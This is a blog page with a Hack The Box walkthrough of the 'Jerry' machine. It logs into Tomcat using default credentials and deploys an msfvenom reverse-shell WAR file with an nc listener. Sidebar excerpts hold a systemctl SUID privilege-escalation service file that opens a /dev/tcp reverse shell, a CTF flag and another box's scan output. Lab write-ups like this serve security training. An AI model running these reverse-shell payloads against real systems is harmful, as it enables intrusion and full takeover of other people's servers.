Skip to main content

HacktheBox.eu - Jerry - Update

HacktheBox.eu - Jerry - Update


Recon


Let's use threader3000 for our recon scan. It's a threaded scanner writing in python that does a super quick up/down scan on all TCP ports, then suggests a nmap scan based on the results. It will automatically save the nmap scan results as XML, then we can convert it to HTML


xsltproc ./jerry.htb/jerry.htb.xml -o ./jerry.html




Ouch, not a lot to go on here. We just have port 8080 running apache tomcat/Coyote JSP version 1.1


Let's see if we can browse to the site.



Looks like a generic Apache Tomcat page. There is authentication required for the buttons on the right.


We get this error message


It looks like the default user/pass  should be tomcat/s3cret


If we try this it does look like it works, we can get some more information about this box.





Looks like we have a 64-bit Windows Server 2012 R2 box


Google around for Tomcat 7.0.88 exploit and you will come across this blog


https://www.ethicaltechsupport.com/blog-post/apache-tomcat-war-backdoor/


Which basically says we can use msfvenom to craft a war file that we  can upload directly in this management interface..


Let's give it a try!





Exploit





First we will need to build our malicious war file with msfvenom


msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.13 LPORT=5555 -f war > circusmonkey.war


Here we are telling msvenom a java war file with a reverse tcp connection back to our kali box on 10.10.14.13 port 5555, and to save out the results to a file called circusmonkey.war


Next we need to setup our listener on our kali box


nc -lnvp 5555



Now we can add it to Jerry by using the "War file to deploy" option.



Just browse to the circusmonkey.war file we created and upload it.



Here we can see that we were able to deploy our malicious war file to the server so I we browse to that location, we get our shell back…… not only do we get our shell back.




We are in as System. Game Over




If we navigate to the Desktop folder of the administrator account we see there is a text file named "2 for the price of one" which contains both the user and root flags.





Comments

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar